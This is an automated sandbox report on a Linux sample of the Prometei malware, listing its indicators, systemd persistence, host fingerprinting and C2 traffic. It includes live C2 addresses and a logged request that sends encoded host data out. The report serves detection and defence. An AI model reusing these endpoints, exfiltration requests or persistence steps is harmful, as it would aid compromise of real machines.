
Linux Analysis Report
na.elf

Overview

General Information

Sample name: na.elf
Analysis ID: 1652748
MD5: 6573a24653020e43e6b1334876e9e365
SHA1: c37494f055c96a1c382926296ebc0667e6c765d8
SHA256: 8ae62082b05ff343af8c51805259620512262b298e244f10c36982489df633fd
Tags: elf, user-abuse_ch

Detection

Prometei
Score: 92
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Yara detected Prometei
Drops files in suspicious directories
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Found Tor onion address
Sample deletes itself
Sample is packed with UPX
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "pgrep" command to search for and/or send signals to processes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "uname" command used to read OS and architecture name
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to set the executable flag
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Classification chart (axes): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1652748
Start date and time: 2025-03-31 13:33:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: na.elf
Detection: MAL
Classification: mal92.troj.evad.linELF@0/13@0/0
  • VT rate limit hit for: na.elf
Command: /tmp/na.elf
PID: 6203
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Starting...
System install...OK
Standard Error: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service → /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • na.elf (PID: 6203, Parent: 6120, MD5: 6573a24653020e43e6b1334876e9e365) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6206, Parent: 6203)
    • sh (PID: 6206, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"
      • sh New Fork (PID: 6207, Parent: 6206)
      • pgrep (PID: 6207, Parent: 6206, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf
    • na.elf New Fork (PID: 6211, Parent: 6203)
    • sh (PID: 6211, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof na.elf"
      • sh New Fork (PID: 6212, Parent: 6211)
      • pidof (PID: 6212, Parent: 6211, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof na.elf
    • na.elf New Fork (PID: 6215, Parent: 6203)
    • sh (PID: 6215, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 6216, Parent: 6215)
      • pgrep (PID: 6216, Parent: 6215, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • na.elf New Fork (PID: 6219, Parent: 6203)
    • sh (PID: 6219, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"
      • sh New Fork (PID: 6222, Parent: 6219)
      • pidof (PID: 6222, Parent: 6219, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay
    • na.elf New Fork (PID: 6225, Parent: 6203)
    • sh (PID: 6225, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 6226, Parent: 6225)
      • pgrep (PID: 6226, Parent: 6225, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • na.elf New Fork (PID: 6232, Parent: 6203)
    • sh (PID: 6232, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 6235, Parent: 6232)
      • pidof (PID: 6235, Parent: 6232, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • na.elf New Fork (PID: 6244, Parent: 6203)
    • sh (PID: 6244, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6245, Parent: 6244)
      • systemctl (PID: 6245, Parent: 6244, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • na.elf New Fork (PID: 6262, Parent: 6203)
    • sh (PID: 6262, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 6263, Parent: 6262)
      • systemctl (PID: 6263, Parent: 6262, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • na.elf New Fork (PID: 6269, Parent: 6203)
    • sh (PID: 6269, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 6282, Parent: 6269)
      • systemctl (PID: 6282, Parent: 6269, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • fwupd New Fork (PID: 6234, Parent: 1)
  • gpg (PID: 6234, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version
  • fwupd New Fork (PID: 6237, Parent: 1)
  • gpg (PID: 6237, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6239, Parent: 1)
  • gpg (PID: 6239, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6243, Parent: 1)
  • gpg (PID: 6243, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • fwupd New Fork (PID: 6247, Parent: 1)
  • gpg (PID: 6247, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • systemd New Fork (PID: 6249, Parent: 6248)
  • snapd-env-generator (PID: 6249, Parent: 6248, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6267, Parent: 6266)
  • snapd-env-generator (PID: 6267, Parent: 6266, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6283, Parent: 1)
  • uplugplay (PID: 6283, Parent: 1, MD5: 6573a24653020e43e6b1334876e9e365) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 6284, Parent: 6283)
      • sh (PID: 6285, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 6286, Parent: 6285)
        • uplugplay (PID: 6286, Parent: 6285, MD5: 6573a24653020e43e6b1334876e9e365) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 6292, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6293, Parent: 6292)
            • hostnamectl (PID: 6293, Parent: 6292, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6297, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6298, Parent: 6297)
            • hostnamectl (PID: 6298, Parent: 6297, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6433, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6437, Parent: 6433)
            • dmidecode (PID: 6437, Parent: 6433, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6436, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6438, Parent: 6436)
            • uptime (PID: 6438, Parent: 6436, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6441, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6442, Parent: 6441)
            • uname (PID: 6442, Parent: 6441, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
          • sh (PID: 6445, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 6446, Parent: 6445)
            • dmidecode (PID: 6446, Parent: 6445, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 6453, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6454, Parent: 6453)
            • uptime (PID: 6454, Parent: 6453, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6457, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6458, Parent: 6457)
            • uname (PID: 6458, Parent: 6457, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • systemd New Fork (PID: 6299, Parent: 1)
  • systemd-hostnamed (PID: 6299, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • cleanup
Source | Rule | Description | Author | Strings
na.elf | Linux_Trojan_Dofloo_ac3333d1 | unknown | unknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Source | Rule | Description | Author | Strings
/usr/sbin/uplugplay | Linux_Trojan_Dofloo_ac3333d1 | unknown | unknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Source | Rule | Description | Author | Strings
6203.1.0000000000401000.00000000004f9000.r-x.sdmp | Linux_Hacktool_Flooder_1a4eb229 | unknown | unknown
  • 0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
6203.1.0000000000401000.00000000004f9000.r-x.sdmp | Linux_Hacktool_Flooder_f454ec10 | unknown | unknown
  • 0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
6203.1.000000000052d000.0000000001575000.rw-.sdmp | Linux_Trojan_Dofloo_ac3333d1 | unknown | unknown
  • 0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 6203 | JoeSecurity_Prometei | Yara detected Prometei | Joe Security
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-31T13:34:09.010173+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.23 | 58304 | 152.36.128.18 | 80 | TCP
    2025-03-31T13:34:16.235087+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.23 | 58306 | 152.36.128.18 | 80 | TCP


    AV Detection

    Source: na.elf | Avira: detected
    Source: /usr/sbin/uplugplay | Avira: detection malicious, Label: LINUX/GM.Agent.JQ

    Bitcoin Miner

    Source: Yara match | File source: Process Memory Space: na.elf PID: 6203, type: MEMORYSTR
    Source: /usr/sbin/uplugplay (PID: 6286) | Reads CPU info from proc file: /proc/cpuinfo
    Source: /usr/bin/pgrep (PID: 6207) | Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pgrep (PID: 6216) | Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pgrep (PID: 6226) | Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/sbin/uplugplay (PID: 6286) | Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/uptime (PID: 6438) | Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/uptime (PID: 6454) | Reads CPU info from /sys: /sys/devices/system/cpu/online

    Networking

    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp | String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp | String found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
    Source: global traffic | HTTP traffic detected: GET /cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673 HTTP/1.0 Host: 152.36.128.18
    Source: global traffic | HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDA2OjM0OjE0IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAzLjQwLCAxLjM1LCAwLjUzfDE3NDM0MjA4NTQNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=W40DBT2U1D37V673&h=galassia&enckey=TmbdLiekzW9/hq5lwm3rcjU2VdABOdSopMttuU0H8ytJDWb2XrwvKxBq9miWReqZ7F5I6lX8mG2W4uJWg0eUNgzz2AON1JQuBzxmHUumNid6UyxTjxYN8mzz60B4UOKC7KQSrTdYYxJQos7bNwZez+xHpIHs53XTOkx1hCG1wJQ= HTTP/1.0 Host: 152.36.128.18
    Source: /usr/sbin/uplugplay (PID: 6286) | Socket: 0.0.0.0:89
    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58304 -> 152.36.128.18:80
    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58306 -> 152.36.128.18:80
    Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: na.elf, uplugplay.12.dr | String found in binary or memory: http://152.36.128
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp | String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp | String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp | String found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp | String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
    Source: na.elf, uplugplay.12.dr | String found in binary or memory: http://upx.sf.net
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp | String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
    Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 44998
    Source: unknown | Network traffic detected: HTTP traffic on port 44998 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443

    System Summary

    Source: na.elf, type: SAMPLE | Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: 6203.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
    Source: 6203.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
    Source: 6203.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: /usr/sbin/uplugplay, type: DROPPED | Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: LOAD without section mappings | Program segment: 0x400000
    Source: na.elf, type: SAMPLE | Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: 6203.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
    Source: 6203.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
    Source: 6203.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: /usr/sbin/uplugplay, type: DROPPED | Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: classification engine | Classification label: mal92.troj.evad.linELF@0/13@0/0

    Data Obfuscation

    Source: initial sample | String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sample | String containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $
    Source: /usr/bin/pidof (PID: 6212) | Directory: //.
    Source: /usr/bin/pidof (PID: 6222) | Directory: //.
    Source: /usr/bin/pidof (PID: 6235) | Directory: //.
    Source: /usr/bin/gpg (PID: 6237) | File: /var/lib/fwupd/gnupg/.#lk0x000055c247a27b80.galassia.6237
    Source: /usr/bin/gpg (PID: 6239) | File: /var/lib/fwupd/gnupg/.#lk0x0000556998804b80.galassia.6239
    Source: /usr/bin/gpg (PID: 6243) | File: /var/lib/fwupd/gnupg/.#lk0x000055ce0f126b80.galassia.6243
    Source: /usr/bin/gpg (PID: 6247) | File: /var/lib/fwupd/gnupg/.#lk0x00005576795d1b80.galassia.6247
    Source: /lib/systemd/systemd-hostnamed (PID: 6299) | Directory: <invalid fd (10)>/..
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/2/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/124/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/124/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/3/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/3/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/4/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/4/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/125/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/125/cmdlineJump to behavior
    Source: /tmp/na.elf (PID: 6206); Shell command executed: sh -c "pgrep na.elf"
    Source: /tmp/na.elf (PID: 6211); Shell command executed: sh -c "pidof na.elf"
    Source: /tmp/na.elf (PID: 6215); Shell command executed: sh -c "pgrep uplugplay"
    Source: /tmp/na.elf (PID: 6219); Shell command executed: sh -c "pidof uplugplay"
    Source: /tmp/na.elf (PID: 6225); Shell command executed: sh -c "pgrep upnpsetup"
    Source: /tmp/na.elf (PID: 6232); Shell command executed: sh -c "pidof upnpsetup"
    Source: /tmp/na.elf (PID: 6244); Shell command executed: sh -c "systemctl daemon-reload"
    Source: /tmp/na.elf (PID: 6262); Shell command executed: sh -c "systemctl enable uplugplay.service"
    Source: /tmp/na.elf (PID: 6269); Shell command executed: sh -c "systemctl start uplugplay.service"
    Source: /usr/sbin/uplugplay (PID: 6285); Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"
    Source: /usr/sbin/uplugplay (PID: 6292); Shell command executed: sh -c hostnamectl
    Source: /usr/sbin/uplugplay (PID: 6297); Shell command executed: sh -c hostnamectl
    Source: /usr/sbin/uplugplay (PID: 6433); Shell command executed: sh -c "dmidecode --type baseboard"
    Source: /usr/sbin/uplugplay (PID: 6436); Shell command executed: sh -c uptime
    Source: /usr/sbin/uplugplay (PID: 6441); Shell command executed: sh -c "uname -a"
    Source: /usr/sbin/uplugplay (PID: 6445); Shell command executed: sh -c dmidecode
    Source: /usr/sbin/uplugplay (PID: 6453); Shell command executed: sh -c uptime
    Source: /usr/sbin/uplugplay (PID: 6457); Shell command executed: sh -c "uname -a"
    Source: /bin/sh (PID: 6207); Pgrep executable: /usr/bin/pgrep -> pgrep na.elf
    Source: /bin/sh (PID: 6216); Pgrep executable: /usr/bin/pgrep -> pgrep uplugplay
    Source: /bin/sh (PID: 6226); Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetup
    Source: /bin/sh (PID: 6245); Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
    Source: /bin/sh (PID: 6263); Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.service
    Source: /bin/sh (PID: 6282); Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.service
    Source: /usr/sbin/uplugplay (PID: 6286); Reads from proc file: /proc/cpuinfo
    Source: /usr/sbin/uplugplay (PID: 6286); Reads from proc file: /proc/stat
    Source: /usr/sbin/uplugplay (PID: 6286); Reads from proc file: /proc/meminfo
    Source: /tmp/na.elf (PID: 6203); File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)
    Source: /tmp/na.elf (PID: 6203); File written: /usr/sbin/uplugplay (dropped file)
    Source: submitted sample; Stderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.; exit code = 0

    Hooking and other Techniques for Hiding and Protection

    Source: /tmp/na.elf (PID: 6203); File: /usr/sbin/uplugplay (dropped file)
    Source: /bin/sh (PID: 6437); Dmidecode executable: /usr/sbin/dmidecode -> dmidecode --type baseboard
    Source: /bin/sh (PID: 6446); Dmidecode executable: /usr/sbin/dmidecode -> dmidecode
    Source: /tmp/na.elf (PID: 6203); File: /tmp/na.elf
    Source: na.elf (submission file); segment LOAD with 7.6054 entropy (max. 8.0)
    Source: na.elf (submission file); segment LOAD with 7.943 entropy (max. 8.0)
    Source: uplugplay.12.dr (dropped file); segment LOAD with 7.6054 entropy (max. 8.0)
    Source: uplugplay.12.dr (dropped file); segment LOAD with 7.943 entropy (max. 8.0)
    Source: /usr/sbin/uplugplay (PID: 6286); Reads CPU info from proc file: /proc/cpuinfo
    Source: /usr/bin/pgrep (PID: 6207); Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pgrep (PID: 6216); Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pgrep (PID: 6226); Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/sbin/uplugplay (PID: 6286); Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/uptime (PID: 6438); Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/uptime (PID: 6454); Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /tmp/na.elf (PID: 6203); Queries kernel information via 'uname'
    Source: /usr/bin/gpg (PID: 6237); Queries kernel information via 'uname'
    Source: /usr/bin/gpg (PID: 6239); Queries kernel information via 'uname'
    Source: /usr/bin/gpg (PID: 6243); Queries kernel information via 'uname'
    Source: /usr/bin/gpg (PID: 6247); Queries kernel information via 'uname'
    Source: /usr/sbin/uplugplay (PID: 6283); Queries kernel information via 'uname'
    Source: /usr/sbin/uplugplay (PID: 6286); Queries kernel information via 'uname'
    Source: /usr/bin/uname (PID: 6442); Queries kernel information via 'uname'
    Source: /usr/bin/uname (PID: 6458); Queries kernel information via 'uname'
    Source: /lib/systemd/systemd-hostnamed (PID: 6299); Queries kernel information via 'uname'

    Language, Device and Operating System Detection

    Source: /bin/sh (PID: 6437); Dmidecode executable: /usr/sbin/dmidecode -> dmidecode --type baseboard
    Source: /bin/sh (PID: 6446); Dmidecode executable: /usr/sbin/dmidecode -> dmidecode
    Source: /bin/sh (PID: 6442); Uname executable: /usr/bin/uname -> uname -a
    Source: /bin/sh (PID: 6458); Uname executable: /usr/bin/uname -> uname -a
    MITRE ATT&CK Matrix (by tactic; the number in parentheses is the count of matched signatures for that technique, entries without a count are unmatched matrix cells)

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
    Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
    Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd
    Persistence: Systemd Service (1); Scripting (1); Logon Script (Windows); Login Hook; Network Logon Script
    Privilege Escalation: Systemd Service (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
    Defense Evasion: Masquerading (1); File and Directory Permissions Modification (1); Hidden Files and Directories (1); Obfuscated Files or Information (11); File Deletion (1)
    Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
    Discovery: Security Software Discovery (1); System Information Discovery (14); Query Registry; System Network Configuration Discovery; Internet Connection Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
